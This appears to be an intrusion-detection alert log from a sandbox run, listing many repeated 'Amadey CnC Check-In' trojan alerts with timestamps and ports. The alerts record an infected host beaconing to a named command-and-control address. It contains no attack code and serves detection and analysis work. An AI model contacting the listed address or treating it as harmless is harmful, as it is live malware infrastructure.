SID:	2027700
Source Port:	50327
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450416802027700 02/07/23-20:00:22.006473
SID:	2027700
Source Port:	50416
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450342802027700 02/07/23-20:00:00.462429
SID:	2027700
Source Port:	50342
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450161802027700 02/07/23-19:59:11.700306
SID:	2027700
Source Port:	50161
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450431802027700 02/07/23-20:00:25.972242
SID:	2027700
Source Port:	50431
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450291802027700 02/07/23-19:59:47.841889
SID:	2027700
Source Port:	50291
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450294802027700 02/07/23-19:59:48.563161
SID:	2027700
Source Port:	50294
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449891802027700 02/07/23-19:57:56.954067
SID:	2027700
Source Port:	49891
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450075802027700 02/07/23-19:58:48.119366
SID:	2027700
Source Port:	50075
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450164802027700 02/07/23-19:59:12.434295
SID:	2027700
Source Port:	50164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449914802027700 02/07/23-19:58:02.515565
SID:	2027700
Source Port:	49914
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449980802027700 02/07/23-19:58:20.421307
SID:	2027700
Source Port:	49980
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449850802027700 02/07/23-19:57:44.320306
SID:	2027700
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450225802027700 02/07/23-19:59:29.829004
SID:	2027700
Source Port:	50225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450355802027700 02/07/23-20:00:05.610275
SID:	2027700
Source Port:	50355
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449736802027700 02/07/23-19:57:14.683730
SID:	2027700
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449866802027700 02/07/23-19:57:51.087084
SID:	2027700
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449825802027700 02/07/23-19:57:37.561460
SID:	2027700
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449996802027700 02/07/23-19:58:26.579679
SID:	2027700
Source Port:	49996
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450006802027700 02/07/23-19:58:29.008274
SID:	2027700
Source Port:	50006
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449955802027700 02/07/23-19:58:14.419186
SID:	2027700
Source Port:	49955
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450136802027700 02/07/23-19:59:05.899724
SID:	2027700
Source Port:	50136
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449777802027700 02/07/23-19:57:23.720957
SID:	2027700
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450266802027700 02/07/23-19:59:39.687644
SID:	2027700
Source Port:	50266
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450396802027700 02/07/23-20:00:15.510798
SID:	2027700
Source Port:	50396
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450314802027700 02/07/23-19:59:53.406803
SID:	2027700
Source Port:	50314
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450444802027700 02/07/23-20:00:29.095831
SID:	2027700
Source Port:	50444
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450403802027700 02/07/23-20:00:17.175192
SID:	2027700
Source Port:	50403
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450059802027700 02/07/23-19:58:41.853764
SID:	2027700
Source Port:	50059
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450157802027700 02/07/23-19:59:10.761628
SID:	2027700
Source Port:	50157
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450062802027700 02/07/23-19:58:42.938578
SID:	2027700
Source Port:	50062
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449829802027700 02/07/23-19:57:38.585640
SID:	2027700
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449927802027700 02/07/23-19:58:07.969609
SID:	2027700
Source Port:	49927
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449832802027700 02/07/23-19:57:39.308335
SID:	2027700
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450160802027700 02/07/23-19:59:11.468507
SID:	2027700
Source Port:	50160
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449734802027700 02/07/23-19:57:14.182238
SID:	2027700
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450451802027700 02/07/23-20:00:30.804845
SID:	2027700
Source Port:	50451
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450001802027700 02/07/23-19:58:27.747122
SID:	2027700
Source Port:	50001
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450255802027700 02/07/23-19:59:37.003438
SID:	2027700
Source Port:	50255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450353802027700 02/07/23-20:00:05.126188
SID:	2027700
Source Port:	50353
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449930802027700 02/07/23-19:58:08.681863
SID:	2027700
Source Port:	49930
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449988802027700 02/07/23-19:58:22.324290
SID:	2027700
Source Port:	49988
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449762802027700 02/07/23-19:57:20.088453
SID:	2027700
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450090802027700 02/07/23-19:58:51.779336
SID:	2027700
Source Port:	50090
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449860802027700 02/07/23-19:57:49.596112
SID:	2027700
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450095802027700 02/07/23-19:58:53.020938
SID:	2027700
Source Port:	50095
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450448802027700 02/07/23-20:00:30.077914
SID:	2027700
Source Port:	50448
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449963802027700 02/07/23-19:58:16.325115
SID:	2027700
Source Port:	49963
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450423802027700 02/07/23-20:00:24.067700
SID:	2027700
Source Port:	50423
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449804802027700 02/07/23-19:57:32.699147
SID:	2027700
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450386802027700 02/07/23-20:00:13.098003
SID:	2027700
Source Port:	50386
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450132802027700 02/07/23-19:59:02.326823
SID:	2027700
Source Port:	50132
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449770802027700 02/07/23-19:57:21.824482
SID:	2027700
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449983802027700 02/07/23-19:58:21.153208
SID:	2027700
Source Port:	49983
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450227802027700 02/07/23-19:59:30.297316
SID:	2027700
Source Port:	50227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450222802027700 02/07/23-19:59:29.105694
SID:	2027700
Source Port:	50222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449739802027700 02/07/23-19:57:15.413161
SID:	2027700
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450185802027700 02/07/23-19:59:17.468502
SID:	2027700
Source Port:	50185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450381802027700 02/07/23-20:00:11.899082
SID:	2027700
Source Port:	50381
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449898802027700 02/07/23-19:57:58.651415
SID:	2027700
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450317802027700 02/07/23-19:59:54.125434
SID:	2027700
Source Port:	50317
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450104802027700 02/07/23-19:58:55.183792
SID:	2027700
Source Port:	50104
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450358802027700 02/07/23-20:00:06.314097
SID:	2027700
Source Port:	50358
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449857802027700 02/07/23-19:57:48.874538
SID:	2027700
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449893802027700 02/07/23-19:57:57.434157
SID:	2027700
Source Port:	49893
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449935802027700 02/07/23-19:58:09.870706
SID:	2027700
Source Port:	49935
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449697802027700 02/07/23-19:57:03.625893
SID:	2027700
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450026802027700 02/07/23-19:58:34.056162
SID:	2027700
Source Port:	50026
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450067802027700 02/07/23-19:58:46.185179
SID:	2027700
Source Port:	50067
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450263802027700 02/07/23-19:59:38.967068
SID:	2027700
Source Port:	50263
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450373802027700 02/07/23-20:00:09.942649
SID:	2027700
Source Port:	50373
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449754802027700 02/07/23-19:57:18.680477
SID:	2027700
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449852802027700 02/07/23-19:57:46.015163
SID:	2027700
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450082802027700 02/07/23-19:58:49.824851
SID:	2027700
Source Port:	50082
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450410802027700 02/07/23-20:00:18.845590
SID:	2027700
Source Port:	50410
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449840802027700 02/07/23-19:57:41.244153
SID:	2027700
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450079802027700 02/07/23-19:58:49.105142
SID:	2027700
Source Port:	50079
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450202802027700 02/07/23-19:59:21.791441
SID:	2027700
Source Port:	50202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450300802027700 02/07/23-19:59:50.001268
SID:	2027700
Source Port:	50300
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450018802027700 02/07/23-19:58:32.051728
SID:	2027700
Source Port:	50018
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450198802027700 02/07/23-19:59:20.390515
SID:	2027700
Source Port:	50198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450116802027700 02/07/23-19:58:58.086949
SID:	2027700
Source Port:	50116
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449907802027700 02/07/23-19:58:00.832041
SID:	2027700
Source Port:	49907
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449787802027700 02/07/23-19:57:28.606188
SID:	2027700
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450428802027700 02/07/23-20:00:25.267783
SID:	2027700
Source Port:	50428
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449910802027700 02/07/23-19:58:01.546921
SID:	2027700
Source Port:	49910
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450345802027700 02/07/23-20:00:01.959618
SID:	2027700
Source Port:	50345
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449782802027700 02/07/23-19:57:25.569842
SID:	2027700
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449824802027700 02/07/23-19:57:37.320314
SID:	2027700
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450152802027700 02/07/23-19:59:09.531894
SID:	2027700
Source Port:	50152
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449809802027700 02/07/23-19:57:33.899731
SID:	2027700
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450235802027700 02/07/23-19:59:32.185122
SID:	2027700
Source Port:	50235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449726802027700 02/07/23-19:57:12.281502
SID:	2027700
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450054802027700 02/07/23-19:58:40.604509
SID:	2027700
Source Port:	50054
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450309802027700 02/07/23-19:59:52.188472
SID:	2027700
Source Port:	50309
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450407802027700 02/07/23-20:00:18.142047
SID:	2027700
Source Port:	50407
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450137802027700 02/07/23-19:59:06.138198
SID:	2027700
Source Port:	50137
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449902802027700 02/07/23-19:57:59.605442
SID:	2027700
Source Port:	49902
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450230802027700 02/07/23-19:59:30.997466
SID:	2027700
Source Port:	50230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449865802027700 02/07/23-19:57:50.851457
SID:	2027700
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449943802027700 02/07/23-19:58:11.590299
SID:	2027700
Source Port:	49943
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450443802027700 02/07/23-20:00:28.848844
SID:	2027700
Source Port:	50443
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450271802027700 02/07/23-19:59:41.182547
SID:	2027700
Source Port:	50271
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449790802027700 02/07/23-19:57:29.323510
SID:	2027700
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450087802027700 02/07/23-19:58:51.030172
SID:	2027700
Source Port:	50087
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450129802027700 02/07/23-19:59:01.428744
SID:	2027700
Source Port:	50129
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

